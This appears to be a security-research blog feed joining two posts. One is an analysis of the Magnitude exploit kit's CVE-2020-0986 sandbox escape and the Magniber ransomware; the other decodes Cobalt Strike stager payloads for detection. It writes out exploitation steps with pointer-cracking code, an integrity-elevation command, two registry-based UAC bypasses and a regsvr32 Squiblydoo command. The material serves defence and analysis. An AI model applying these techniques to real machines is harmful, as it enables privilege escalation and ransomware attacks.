Magnitude escapes the EPM sandbox by exploiting CVE-2020-0986, a memory corruption vulnerability in splwow64.exe. Since the vulnerable code is running with medium integrity and a low integrity process can trigger it using Local Procedure Calls (LPC), this vulnerability can be used to get from the EPM sandbox to medium integrity. CVE-2020-0986 and the ways to exploit it are already discussed in detail in blog posts by both Kaspersky and Project Zero. This section will therefore focus on Magnitude’s implementation of the exploit, please refer to the other blog posts for further technical details about the vulnerability. 

The vulnerable code from gdi32.dll can be seen below. It is a part of an LPC server and it can be triggered by an LPC call, with both r8 and rdi pointing into a memory section that is shared between the LPC client and the LPC server. This essentially gives the attacker the ability to call memcpy inside the splwow64 process while having control over all three arguments, which can be immediately converted into an arbitrary read/write primitive. Arbitrary read is just a call to memcpy with the dest being inside the shared memory and src being the target address. Conversely, arbitrary write is a call to memcpy with the dest being the target address and the src being in the shared memory.

The vulnerable code from gdi32.dll. When it gets executed, both r8 and rdi are pointing into attacker-controllable memory.

However, there is one tiny problem that makes exploitation a bit more difficult. As can be seen in the disassembled code above, the count of the memcpy is obtained by adding the dereferenced content of two word pointers, located close by the src address. This is not a problem for (smaller) arbitrary writes, since the attacker can just plant the desired count beforehand into the shared memory. But for arbitrary reads, the count is not directly controllable by the attacker and it can be anywhere between 0 and 0x1FFFE, which could either crash splwow64 or perform a memcpy with either zero or a smaller than desired count. To get around this, the attacker can perform arbitrary reads by triggering the vulnerable code twice. The first time, the vulnerability can be used as an arbitrary write to plant the correct count at the necessary offset and the second time, it can be used to actually read the desired memory content. This technique has some downsides, such as that it cannot be used to read non-writable memory, but that is not an issue for Magnitude.

The exploit starts out by creating a named mutex to make sure that there is only a single instance of it running. Then, it calls CreateDCW to spawn the splwow64 process that is to be exploited and performs all the necessary preparations to enable sending LPC messages to it later on. The exploit also contains an embedded 64-bit PE file, which it drops to %TEMP% and executes from there. This PE file serves two different purposes and decides which one to fulfill based on whether there is a command-line argument or not. The first purpose is to gather various 64-bit pointers and feed them back to the main exploit module. The second purpose is to serve as a loader for the final payload once the vulnerability has been successfully exploited.

There are three pointers that are obtained by the dropped 64-bit PE file when it runs for the first time. The first one is the address of fpDocumentEvent, which stores a pointer to DocumentEvent, protected using the EncodePointer function. This pointer is obtained by scanning gdi32.dll (or gdi32full.dll) for a static sequence of instructions that set the value at this address. The second pointer is the actual address of DocumentEvent, as exported from winspool.drv and the third one is the pointer to system, exported from msvcrt.dll. Once the 64-bit module has all three pointers, it drops them into a temporary file and terminates itself.

The exploit scans gdi32.dll for the sequence of the four underlined instructions and extracts the address of fpDocumentEvent from the operands of the last instruction.
The exploit extracting the address of fpDocumentEvent from gdi32.dll

The main 32-bit module then reads the dropped file and uses the obtained values during the actual exploitation, which can be characterized by the following sequence of actions:

  1. The exploit leaks the value at the address of fpDocumentEvent in the splwow64 process. The value is leaked by sending two LPC messages, using the arbitrary read primitive described above.
  2. The leaked value is an encoded pointer to DocumentEvent. Using this encoded pointer and the actual, raw, pointer to DocumentEvent, the exploit cracks the secret value that was used for pointer encoding. Read the Kaspersky blog post for how this can be done.
  3. Using the obtained secret value, the exploit encodes the pointer to system, so that calling the function DecodePointer on this newly encoded value inside splwow64 will yield the raw pointer to system.
  4. Using the arbitrary write primitive, the exploit overwrites fpDocumentEvent with the encoded pointer to system.
  5. The exploit triggers the vulnerable code one more time. Only this time, it is not interested in any memory copying, so it sets the count for memcpy to zero. Instead, it counts on the fact that splwow64 will try to decode and call the pointer at fpDocumentEvent. Since this pointer was substituted in the previous step, splwow64 will call system instead of DocumentEvent. The first argument to DocumentEvent is read from the shared memory section, which means that it is controllable by the attacker, who can therefore pass an arbitrary command to system.
  6. Finally, the exploit uses the arbitrary write primitive one last time and restores fpDocumentEvent to its original value. This is an attempt to clean up after the exploit, but splwow64 might still be unstable because a random pointer got corrupted when the exploit planted the count needed for the leak during the first step.
The exploit cracking the secret used for encoding fpDocumentEvent
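
As a rough illustration of step 2 (not Magnitude's actual code), the following sketch brute-forces the per-process secret from the leaked encoded pointer and the raw DocumentEvent address, assuming the commonly documented EncodePointer behavior of XORing the pointer with the secret and rotating right by the low six bits of the secret:

MASK64 = (1 << 64) - 1

def rol64(value, count):
    count &= 63
    return ((value << count) | (value >> (64 - count))) & MASK64

def ror64(value, count):
    count &= 63
    return ((value >> count) | (value << (64 - count))) & MASK64

def crack_secret(raw_ptr, encoded_ptr):
    # try all 64 possible rotation amounts and keep the self-consistent candidate
    for rot in range(64):
        candidate = rol64(encoded_ptr, rot) ^ raw_ptr
        if candidate & 0x3F == rot:
            return candidate
    return None

def encode_pointer(ptr, secret):
    # re-encode another pointer (e.g. system) so that DecodePointer in splwow64 yields it
    return ror64(ptr ^ secret, secret & 0x3F)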

The command that Magnitude executes in the call to system looks like this:

icacls <dropped_64bit_PE> /Q /C /setintegritylevel Medium && <dropped_64bit_PE>

This elevates the dropped 64-bit PE file to medium integrity and executes it for the second time. This time, it will not gather any pointers, but it will instead extract an embedded payload from within itself and inject it into a suitable process. Currently, the injected payload is the Magniber ransomware.

Magniber

Magniber emerged in 2017 when Magnitude started deploying it as a replacement for the Cerber ransomware. Even though it is almost four years old, it still gets updated frequently and so a lot has changed since it was last written about. The early versions featured server-side AES key generation and contained constant fallback encryption keys in case the server was unreachable. A decryptor that worked when encryption was performed using these fallback keys was developed by the Korea Internet & Security Agency and published on No More Ransom. The attackers responded to this by updating Magniber to generate the encryption keys locally, but the custom PRNG based on GetTickCount was very weak, so researchers from Kookmin University were able to develop a method to recover the encrypted files. Unfortunately, Magniber got updated again, and it is currently using the custom PRNG shown below. This function is used to generate a single random byte and it is called 32 times per encrypted file (16 times to generate the AES-128 key and 16 times to generate the IV). 

While this PRNG still looks very weak at first glance, we believe there is no reasonably efficient method to attack it. The tick count is not the problem here: it is with extremely high probability going to be constant throughout all iterations of the loop and its value could be guessed by inspecting event logs and timestamps of the encrypted files. The problem lies in the RtlRandomEx function, which gets called 640 times (2 * 10 * (16 + 16)) per each encrypted file. This means that the function is likely going to get called millions of times during encryption and leaking and tracking its internal state throughout all of these calls unfortunately seems infeasible. At best, it might be possible to decrypt the first few encrypted files. And even that wouldn’t be possible on newer CPUs and Windows versions, because RtlRandomEx there internally uses the rdrand instruction, which arguably makes this a somewhat decent PRNG for cryptography. 

The PRNG used by Magniber to generate encryption keys

The ransomware starts out by creating a named mutex and generating an identifier from the victim’s computer name and volume serial number. Then, it enumerates in random order all logical drives that are not DRIVE_NO_ROOT_DIR or DRIVE_CDROM and proceeds to recursively traverse them to encrypt individual files. Some folders, such as sample music or tor browser, are excluded from encryption, as are all hidden, system, readonly, temporary, and virtual files. The full list of excluded folders can be found in our IoC repository.

Just like many other ransomware strains, Magniber only encrypts files with certain preselected extensions, such as .doc or .xls. Its configuration contains two sets of extension hashes and each file gets encrypted only if the hash of its extension can be found in one of these sets. The division into two sets was presumably done to assign priority to the extensions. Magniber goes through the whole filesystem in two sweeps. In the first one, it encrypts files with extensions from the higher-priority set. In the second sweep, it encrypts the rest of the files with extensions from the lower-priority set. Interestingly, the higher-priority set also contains nine extensions that were additionally obfuscated, unlike the rest of the higher-priority set. It seems that the attackers were trying to hide these extensions from reverse engineers. You can find these and the other extensions that Magniber encrypts in our IoC repository.

To encrypt a file, Magniber first generates a random 128-bit AES key and IV using the PRNG discussed above. For some bizarre reason, it only chooses to generate bytes from the range 0x03 to 0xFC, effectively reducing the size of the keyspace from 256^16 to 250^16. Magniber then reads the input file by chunks of up to 0x100000 bytes, continuously encrypting each chunk in CBC mode and writing it back to the input file. Once the whole file is encrypted, Magniber also encrypts the AES key and IV using a public RSA key embedded in the sample and appends the result to the encrypted file. Finally, Magniber renames the file by appending a random-looking extension to its name.

However, there is a bug in the encryption process that puts some encrypted files into a nonrecoverable state, where it is impossible to decrypt them, even for the attackers who possess the corresponding private RSA key. This bug affects all files with a size that is a multiple of 0x100000 (1 MiB). To understand this bug, let’s first investigate in more detail how individual files get encrypted. Magniber splits the input file into chunks and treats the last chunk differently. When the last chunk is encrypted, Magniber sets the Final parameter of CryptEncrypt to TRUE, so CryptoAPI can add padding and finalize the encryption. Only after the last chunk gets encrypted does Magniber append the RSA-encrypted AES key to the file. 

The bug lies in how Magniber determines that it is currently encrypting the last chunk: it treats only chunks of size less than 0x100000 as the last chunks. But this does not work for files the size of which is a multiple of 0x100000, because even the last chunk of such files contains exactly 0x100000 bytes. When Magniber is encrypting such files, it never registers that it is encrypting the last chunk, which causes two problems. The first problem is that it never calls CryptEncrypt with Final=TRUE, so the encrypted files end up with invalid padding. The second, much bigger, problem is that Magniber also does not append the RSA-encrypted AES key, because the trigger for appending it is the encryption of the last chunk. This means that the AES key and IV used for the encryption of the file get lost and there is no way to decrypt the file without them.
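
To make the bug concrete, here is a simplified model of the chunked encryption loop as described above (not Magniber's actual code); the only detail that matters is the flawed last-chunk test:

CHUNK = 0x100000

def encrypt_file_model(file_size):
    remaining = file_size
    finalized = False
    while remaining > 0:
        chunk = min(remaining, CHUNK)
        if chunk < CHUNK:        # flawed "last chunk" test: never true for exact multiples of 1 MiB
            finalized = True     # CryptEncrypt(..., Final=TRUE) and append the RSA-wrapped AES key
        remaining -= chunk
    return finalized

print(encrypt_file_model(0x100000))   # False -> key material never appended, file unrecoverable
print(encrypt_file_model(0x100001))   # True  -> file recoverable with the attackers' private RSA key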

Magniber’s ransom note

Magniber drops its ransom note into every folder where it encrypted at least one file. An extra ransom note is also dropped into %PUBLIC% and opened up automatically in notepad.exe after encryption. The ransom note contains several URLs leading the victims to the payment page, which instructs them on how to pay the ransom in order to obtain the decryptor. These URLs are unique per victim, with the subdomain representing the victim identifier. Magniber also automatically opens up the payment page in the victim’s browser and while doing so, exfiltrates further information about the ransomware deployment through the URL, such as:

  • The number of encrypted files
  • The total size of all encrypted files
  • The number of encrypted logical drives
  • The number of files encountered (encrypted or not)
  • The version of Windows
  • The victim identifier
  • The version of Magniber

Finally, Magniber attempts to delete shadow copies using a UAC bypass. It writes a command to delete them to HKCU\Software\Classes\mscfile\shell\open\command and then executes CompMgmtLauncher.exe assuming that this will run the command with elevated privileges. But since this particular UAC bypass method was fixed in Windows 10, Magniber also contains another bypass method, which it uses exclusively on Windows 10 machines. This other method works similarly, writing the command to HKCU\Software\Classes\ms-settings\shell\open\command, creating a key named DelegateExecute there, and finally running ComputerDefaults.exe. Interestingly, the command used is regsvr32.exe scrobj.dll /s /u /n /i:%PUBLIC%\readme.txt. This is a technique often referred to as Squiblydoo and it is used to run a script dropped into readme.txt, which is shown below.

The scriptlet dropped to readme.txt, designed to delete shadow copies

Conclusion

In this blog post, we examined in detail the current state of the Magnitude exploit kit. We described how it exploits CVE-2021-26411 and CVE-2020-0986 to deploy ransomware to unfortunate victims who browse the Internet using vulnerable builds of Internet Explorer. We found Magnitude to be a mature exploit kit with a very robust infrastructure. It uses thousands of fresh domains each month and its infection chain is composed of seven stages (not even counting the multiple obfuscation layers). The infrastructure is also well protected, which makes it very challenging for malware analysts to track and research the exploit kit.

We also dug deep into the Magniber ransomware. We found a bug that results in some files being encrypted in such a way that even the attackers cannot possibly decrypt them. This underscores the unfortunate fact that paying the ransom is never a guarantee of getting the ransomed files back. This is one of the reasons why we urge ransomware victims to try to avoid paying the ransom.

Even though the attackers behind Magnitude appear to have a good grasp on exploit development, obfuscation, and protection of malicious infrastructure, they seem to have no idea what they are doing when it comes to generating random numbers for cryptographic purposes. This resulted in previous versions of Magniber using flawed PRNGs, which allowed malware researchers to develop decryptors that helped victims recover their ransomed files. However, the Magniber developers were always quick to improve their PRNG, which unfortunately made the decryptors obsolete. The current version of Magniber uses a PRNG that seems to be just secure enough, which makes us believe that there will be no more decryptors in the future.

Indicators of Compromise (IoC)

The full list of IoCs is available at https://github.com/avast/ioc/tree/master/Magnitude.

Redirection page
SHA-256
2cc3ece1163db8b467915f76b187c07e1eb0ca687c8f1efb9d278b8daadbe590
3da50b3752560932d9d123ef813a3b67f5d840fee38a18cc14d18d5dc369bce4
91dbcaa7833aef48fa67c55c26c9c142cb76c5530c0b2a3823c8f74cf52b73cc
db8cf1f5651a44b443a23bc239b4215dcfd0a935458f9d17cb511b2c33e0c3b9
ef15ee0511c2f9e29ecaf907f3ca0bb603f7ec57d320ba61b718c4078b864824
CVE-2021-26411
SHA-256
0306b0b79a85711605bbbfac62ac7d040a556aa7ac9fe58d22ea2e00d51b521a
419da91566a7b1e5720792409301fa772d9abf24dfc3ddde582888112f12937a
6a348a5b13335e453ac34b0ed87e37a153c76a5be528a4ef4b67e988aaf03533
4e80fa124865445719e66d917defd9c8ed3bd436162e3fbc180a12584d372442
217f21bd9d5e92263e3a903cfcea0e6a1d4c3643eed223007a4deb630c4aee26
Shellcode
SHA-256 Note
5d0e45febd711f7564725ac84439b74d97b3f2bc27dbe5add5194f5cdbdbf623 Win10 WoW64 variant
351a2e8a4dc2e60d17208c9efb6ac87983853c83dae5543e22674a8fc5c05234 ^ unpacked
4044008da4fc1d0eb4a0242b9632463a114b2129cedf9728d2d552e379c08037 Win7 WoW64 variant
1ea23d7456195e8674baa9bed2a2d94c7235d26a574adf7009c66d6ec9c994b3 ^ unpacked
3de9d91962a043406b542523e11e58acb34363f2ebb1142d09adbab7861c8a63 Win7 native variant
dfa093364bf809f3146c2b8a5925f937cc41a99552ea3ca077dac0f389caa0da ^ unpacked
e05a4b7b889cba453f02f2496cb7f3233099b385fe156cae9e89bc66d3c80a7f newer Win7 WoW64 variant
ae930317faf12307d3fb9a534fe977a5ef3256e62e58921cd4bf70e0c05bf88a latest Win7 WoW64 variant
CVE-2020-0986
SHA-256 Note
440be2c75d55939c90fc3ef2d49ceeb66e2c762fd4133c935667b3b2c6fb8551 pingback payload
a5edae721568cdbd8d4818584ddc5a192e78c86345b4cdfb4dc2880b9634acab pingback payload
1505368c8f4b7bf718ebd9a44395cfa15657db97a0c13dcf47eb8cfb94e7528b Magniber payload
63525e19aad0aae1b95c3a357e96c93775d541e9db7d4635af5363d4e858a345 Magniber payload
31e99c8f68d340fd046a9f6c8984904331dc6a5aa4151608058ee3aabc7cc905 Magniber payload
Pointer scanner/loader 64-bit module
SHA-256
f8472b1385ed22897c99f413e7b87a05df8be05b270fd57a9b7dd27bed9a79a6
19f57a213e7828e5e32adf169e51e0d165ddf25a6851a726268e10273a8df8b8
b0b709a620509154bc6d7b4e66d0a7daa7fd8ce23d1e104d80128ea3d0bb54e7
d22d616255b3cceff0fbcaba98083f5fda8be951287fb1d1c207fd1887889b2f
7c1fc5dfb970f856abf48cc65bda4f102452216ad8b9f1fe9c7a66650d91959d
Magniber
SHA-256
a2448b93d7c50801056052fb429d04bcf94a478a0a012191d60e595fed63eec4
525f9dbf9a74390fd22779a68f191b099ee9b4d2e8095c57ac1c932629a8af56
3ae5cd106e3130748ef61d317022d7b6ab98a0811088cfc478d49375c352bf04
daf17fbf2bfcfaa2dafb6470a5da0054eb61ab5b44cd8cbbf22f8819f3c432db
fcd8f8647a1d5e08446a392cc6c69090c00714d681c4fa258656e12cd4f80c2e
C&Cs

https://github.com/avast/ioc/blob/master/Magnitude/cncs.txt

Decoy ad domains

https://github.com/avast/ioc/blob/master/Magnitude/decoys.txt

The post Magnitude Exploit Kit: Still Alive and Kicking appeared first on Avast Threat Labs.

Decoding Cobalt Strike: Understanding Payloads

Intro

Cobalt Strike threat emulation software is the de facto standard closed-source/paid tool used by infosec teams in many governments, organizations and companies. It is also very popular among many cybercrime groups, which usually abuse cracked or leaked versions of Cobalt Strike.

Cobalt Strike has multiple unique features and secure communication, and it is fully modular and customizable, so proper detection and attribution can be problematic. This is the main reason why we have seen Cobalt Strike used in almost every major cyber security incident or big breach over the past several years.

There are many great articles about reverse engineering Cobalt Strike software, especially beacon modules as the most important part of the whole chain. Other modules and payloads are very often overlooked, but these parts also contain valuable information for malware researchers and forensic analysts or investigators.

The first part of this series is dedicated to proper identification of all raw payload types and how to decode and parse them. We are also sharing our parsers, scripts and YARA rules based on these findings with the community.

Raw payloads

Cobalt Strike’s payloads are based on Meterpreter shellcode and share many similarities, such as API hashing (x86 and x64 versions) and the checksum8 URL query algorithm used in HTTP/HTTPS payloads, which makes identification harder. This particular checksum8 algorithm is also used in other frameworks, such as Empire.

Let’s describe interesting parts of each payload separately.

Payload header x86 variant

Default 32-bit raw payload entry points start with the typical CLD instruction (0xFC), followed by a CALL instruction and PUSHA (0x60) as the first instruction of the API hashing routine.

x86 payload
Payload header x64 variant

Standard 64-bit variants also start with the CLD instruction, followed by AND RSP, -10h and a CALL instruction.

x64 payload

We can use these patterns to locate payload entry points and compute other fixed offsets relative to this position.

Default API hashes

Raw payloads have a predefined structure and binary format with placeholders for each customizable value, such as DNS queries, HTTP headers or the C2 IP address. The placeholder offsets are at fixed positions, as are the hardcoded API hash values. The hashing algorithm is ROR13 and the final hash is calculated from the API function name and the DLL name. The whole algorithm is nicely commented in the assembly code in the Metasploit repository.

Python implementation of API hashing algorithm
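The code from the screenshot is not reproduced here, so below is a minimal reimplementation of the well-known Metasploit ROR13 scheme (DLL name uppercased and hashed as UTF-16LE including the terminating null, function name hashed as ASCII including the terminating null); it reproduces the values listed in the table below, e.g. 0x0726774c for kernel32.dll_LoadLibraryA.

def ror32(value, count=13):
    # 32-bit rotate right
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def api_hash(dll, func):
    dll_hash = 0
    for b in (dll.upper() + "\x00").encode("utf-16le"):   # DLL name: uppercase UTF-16LE + NUL
        dll_hash = (ror32(dll_hash) + b) & 0xFFFFFFFF
    func_hash = 0
    for b in (func + "\x00").encode("ascii"):             # function name: ASCII + NUL
        func_hash = (ror32(func_hash) + b) & 0xFFFFFFFF
    return (dll_hash + func_hash) & 0xFFFFFFFF

assert api_hash("kernel32.dll", "LoadLibraryA") == 0x0726774C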

We can use the following regex patterns for searching hardcoded API hashes:
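The exact patterns from the original screenshot are not shown here; as a hedged example, the hashes can be located through the immediates of the classic API-call stubs, push imm32; call ebp (68 ?? ?? ?? ?? FF D5) in x86 payloads and mov r10d, imm32; call rbp (41 BA ?? ?? ?? ?? FF D5) in x64 payloads:

import re

API_HASH_X86 = re.compile(rb'\x68(....)\xFF\xD5', re.DOTALL)      # push imm32; call ebp
API_HASH_X64 = re.compile(rb'\x41\xBA(....)\xFF\xD5', re.DOTALL)  # mov r10d, imm32; call rbp

def find_api_hashes(payload, pattern):
    return [int.from_bytes(m.group(1), 'little') for m in pattern.finditer(payload)]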

We can use a list of known API hashes for proper payload type identification, and the known fixed positions of the API hashes for more accurate detection via YARA rules.

Payload identification via known API hashes

Complete Cobalt Strike API hash list:

API hash DLL and API name
0xc99cc96a dnsapi.dll_DnsQuery_A
0x528796c6 kernel32.dll_CloseHandle
0xe27d6f28 kernel32.dll_ConnectNamedPipe
0xd4df7045 kernel32.dll_CreateNamedPipeA
0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x56a2b5f0 kernel32.dll_ExitProcess
0x5de2c5aa kernel32.dll_GetLastError
0x0726774c kernel32.dll_LoadLibraryA
0xcc8e00f4 kernel32.dll_lstrlenA
0xe035f044 kernel32.dll_Sleep
0xbb5f9ead kernel32.dll_ReadFile
0xe553a458 kernel32.dll_VirtualAlloc
0x315e2145 user32.dll_GetDesktopWindow
0x3b2e55eb wininet.dll_HttpOpenRequestA
0x7b18062d wininet.dll_HttpSendRequestA
0xc69f8957 wininet.dll_InternetConnectA
0x0be057b7 wininet.dll_InternetErrorDlg
0xa779563a wininet.dll_InternetOpenA
0xe2899612 wininet.dll_InternetReadFile
0x869e4675 wininet.dll_InternetSetOptionA
0xe13bec74 ws2_32.dll_accept
0x6737dbc2 ws2_32.dll_bind
0x614d6e75 ws2_32.dll_closesocket
0x6174a599 ws2_32.dll_connect
0xff38e9b7 ws2_32.dll_listen
0x5fc8d902 ws2_32.dll_recv
0xe0df0fea ws2_32.dll_WSASocketA
0x006b8029 ws2_32.dll_WSAStartup

Complete API hash list for Windows 10 system DLLs is available here.

Customer ID / Watermark

Based on information provided on the official web pages, the Customer ID is a 4-byte number associated with the Cobalt Strike licence key, and since v3.9 it has been embedded into payloads and beacon configs. If present, this number is located at the end of the payload. The Customer ID could be used to identify or attribute specific threat actors, but a lot of Customer IDs come from cracked or leaked versions, so please consider this when looking at them for possible attribution.

DNS stager x86

The typical payload size is 515 bytes, or 519 bytes with the Customer ID value included. The DNS query name string starts at offset 0x0140 (calculated from the payload entry point) and its maximum size is 63 bytes. If the DNS query name string is shorter, it is terminated with a null byte and the rest of the string space is filled with junk bytes.

DnsQuery_A API function is called with two default parameters:

Parameter Value Constant
DNS Record Type (wType) 0x0010 DNS_TYPE_TEXT
DNS Query Options (Options) 0x0248 DNS_QUERY_BYPASS_CACHE | DNS_QUERY_NO_HOSTS_FILE | DNS_QUERY_RETURN_MESSAGE

Anything other than the default values is suspicious and could indicate a custom payload.

Python parsing:
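The parsing code from the screenshot is not reproduced here; the following is a minimal sketch under the offsets stated above (entry point located via the CLD/CALL pattern, query name placeholder at entry + 0x0140, at most 63 bytes, NUL-terminated):

import re

def parse_dns_stager(payload):
    entry = re.search(rb'\xFC\xE8', payload)                 # CLD; CALL marks the x86 entry point
    if entry is None:
        raise ValueError('payload entry point not found')
    start = entry.start() + 0x0140                           # DNS query name placeholder
    raw = payload[start:start + 63]
    return raw.split(b'\x00', 1)[0].decode('ascii', errors='replace')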

Default DNS payload API hashes:

Offset Hash value API name
0x00a3 0xe553a458 kernel32.dll_VirtualAlloc
0x00bd 0x0726774c kernel32.dll_LoadLibraryA
0x012f 0xc99cc96a dnsapi.dll_DnsQuery_A
0x0198 0x56a2b5f0 kernel32.dll_ExitProcess
0x01a4 0xe035f044 kernel32.dll_Sleep
0x01e4 0xcc8e00f4 kernel32.dll_lstrlenA

Yara rule for DNS stagers:

SMB stager x86

The default payload size is 346 bytes, plus the length of the pipe name string terminated by a null byte and the length of the Customer ID if present. The pipe name string is located right after the payload code, at offset 0x015A, in plaintext format.

CreateNamedPipeA API function is called with 3 default parameters:

Parameter Value Constant
Open Mode (dwOpenMode) 0x0003 PIPE_ACCESS_DUPLEX
Pipe Mode (dwPipeMode) 0x0006 PIPE_TYPE_MESSAGE, PIPE_READMODE_MESSAGE
Max Instances (nMaxInstances) 0x0001

Python parsing:
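Again, only a sketch of the idea (the original code is in the screenshot): read the NUL-terminated pipe name that sits right after the payload code, at offset 0x015A from the entry point:

import re

def parse_smb_stager(payload):
    entry = re.search(rb'\xFC\xE8', payload).start()         # x86 payload entry point
    raw = payload[entry + 0x015A:]
    return raw.split(b'\x00', 1)[0].decode('ascii', errors='replace')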

Default SMB payload API hashes:

Offset Hash value API name
0x00a1 0xe553a458 kernel32.dll_VirtualAlloc
0x00c4 0xd4df7045 kernel32.dll_CreateNamedPipeA
0x00d2 0xe27d6f28 kernel32.dll_ConnectNamedPipe
0x00f8 0xbb5f9ead kernel32.dll_ReadFile
0x010d 0xbb5f9ead kernel32.dll_ReadFile
0x0131 0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x0139 0x528796c6 kernel32.dll_CloseHandle
0x014b 0x56a2b5f0 kernel32.dll_ExitProcess

Yara rule for SMB stagers:

TCP Bind stager x86

The payload size is 332 bytes plus the length of the Customer ID if present. Parameters for the bind API function are stored inside the SOCKADDR_IN structure, hardcoded as two dword PUSHes. The first PUSH, with the sin_addr value, is located at offset 0x00C4. The second PUSH contains the sin_port and sin_family values and is located at offset 0x00C9. The default sin_family value is AF_INET (0x02).

Python parsing:
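A hedged sketch of the same idea, assuming the offsets above point at the PUSH opcodes themselves (so the dword operands start one byte further), with sin_family stored as a little-endian word and sin_port in network byte order:

import re, socket, struct

def parse_tcp_bind_x86(payload):
    entry = re.search(rb'\xFC\xE8', payload).start()
    ip_bytes = payload[entry + 0x00C4 + 1 : entry + 0x00C4 + 5]   # push sin_addr
    fam_port = payload[entry + 0x00C9 + 1 : entry + 0x00C9 + 5]   # push sin_port / sin_family
    family = struct.unpack_from('<H', fam_port, 0)[0]             # expected AF_INET (0x0002)
    port = struct.unpack_from('>H', fam_port, 2)[0]               # network byte order
    return socket.inet_ntoa(ip_bytes), port, family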

Default TCP Bind x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6737dbc2 ws2_32.dll_bind
0x00de 0xff38e9b7 ws2_32.dll_listen
0x00e8 0xe13bec74 ws2_32.dll_accept
0x00f1 0x614d6e75 ws2_32.dll_closesocket
0x00fa 0x56a2b5f0 kernel32.dll_ExitProcess
0x0107 0x5fc8d902 ws2_32.dll_recv
0x011a 0xe553a458 kernel32.dll_VirtualAlloc
0x0128 0x5fc8d902 ws2_32.dll_recv
0x013d 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x86 stagers:

TCP Bind stager x64

The payload size is 510 bytes plus the length of the Customer ID if present. The whole SOCKADDR_IN structure is hardcoded as a qword inside a MOV instruction. The offset of the MOV instruction is 0x00EC.

Python parsing:
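A hedged sketch, assuming the offset above points at a 10-byte mov reg, imm64 instruction (so the qword operand starts two bytes further) and that the qword holds the start of the SOCKADDR_IN structure (sin_family, sin_port, sin_addr):

import re, socket, struct

def parse_tcp_bind_x64(payload):
    entry = re.search(rb'\xFC\x48\x83\xE4\xF0\xE8', payload).start()   # CLD; AND RSP,-10h; CALL
    qword = payload[entry + 0x00EC + 2 : entry + 0x00EC + 10]          # mov reg, imm64 operand
    family = struct.unpack_from('<H', qword, 0)[0]
    port = struct.unpack_from('>H', qword, 2)[0]
    return socket.inet_ntoa(qword[4:8]), port, family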

Default TCP Bind x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6737dbc2 ws2_32.dll_bind
0x0150 0xff38e9b7 ws2_32.dll_listen
0x0161 0xe13bec74 ws2_32.dll_accept
0x016f 0x614d6e75 ws2_32.dll_closesocket
0x0198 0x5fc8d902 ws2_32.dll_recv
0x01b8 0xe553a458 kernel32.dll_VirtualAlloc
0x01d2 0x5fc8d902 ws2_32.dll_recv
0x01ee 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x64 stagers:

TCP Reverse stager x86

The payload size is 290 bytes plus the length of the Customer ID if present. This payload is very similar to TCP Bind x86: the SOCKADDR_IN structure is hardcoded at the same offset with the same double PUSH instructions, so we can reuse the Python parsing code from the TCP Bind x86 payload.

Default TCP Reverse x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6174a599 ws2_32.dll_connect
0x00e5 0x56a2b5f0 kernel32.dll_ExitProcess
0x00f2 0x5fc8d902 ws2_32.dll_recv
0x0105 0xe553a458 kernel32.dll_VirtualAlloc
0x0113 0x5fc8d902 ws2_32.dll_recv

Yara rule for TCP Reverse x86 stagers:

TCP Reverse stager x64

The default payload size is 465 bytes plus the length of the Customer ID if present. The SOCKADDR_IN structure is at the same position as in the TCP Bind x64 payload, so we can reuse the parsing code again.

Default TCP Reverse x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6174a599 ws2_32.dll_connect
0x016b 0x5fc8d902 ws2_32.dll_recv
0x018b 0xe553a458 kernel32.dll_VirtualAlloc
0x01a5 0x5fc8d902 ws2_32.dll_recv
0x01c1 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Reverse x64 stagers:

HTTP stagers x86 and x64

The default x86 payload size is 780 bytes and the x64 version is 874 bytes long, plus the size of the request address string and the size of the Customer ID if present. The payloads include full request information stored inside multiple placeholders.

Request address

The request address is a plaintext string terminated by a null byte, located right after the last payload instruction without any padding. The offset for the x86 version is 0x030C and 0x036A for the x64 payload version. The typical format is IPv4.

Request port

For the x86 version, the request port value is hardcoded inside a PUSH instruction as a dword. The offset of the PUSH instruction is 0x00BE. The port value for the x64 version is stored inside a MOV r8d, dword instruction at offset 0x010D.

Request query

The placeholder for the request query has a max size of 80 bytes and the value is a plaintext string terminated by a null byte. If the request query string is shorter, then the rest of the string space is filled with junk bytes. The placeholder offset for the x86 version is 0x0143 and 0x0186 for the x64 version.

Cobalt Strike and other tools such as Metasploit use a trivial checksum8 algorithm for the request query to distinguish between x86 and x64 payload or beacon. 

According to the leaked Java web server source code, Cobalt Strike uses only two checksum values, 0x5C (92) for x86 payloads and 0x5D (93) for x64 versions. There are also implementations of strict stager variants where the request query string must be exactly 5 characters long (including the slash). The request query checksum feature isn’t mandatory.

Python implementation of checksum8 algorithm:
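The screenshot is not reproduced here; a minimal sketch of the checksum8 idea (sum of the byte values modulo 256, with the leading slash stripped before summing, which is an assumption of this sketch):

def checksum8(query):
    return sum(query.lstrip('/').encode('ascii')) % 0x100

def classify_stager_query(query):
    # Cobalt Strike only uses 0x5C (92) for x86 and 0x5D (93) for x64 payloads
    return {0x5C: 'x86', 0x5D: 'x64'}.get(checksum8(query), 'unknown')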

Metasploit server uses similar values:

You can find a complete list of Cobalt Strike’s x86 and x64 strict request queries here.

Request header

The size of the request header placeholder is 304 bytes and the value is also represented as a plaintext string terminated by a null byte. The request header placeholder is located immediately after the Request query placeholder. The offset for the x86 version is 0x0193 and 0x01D6 for the x64 version.

The typical request header value for HTTP/HTTPS stagers is User-Agent. The Cobalt Strike web server bans user agents that start with lynx, curl or wget and returns a 404 response code if any of these strings are found.

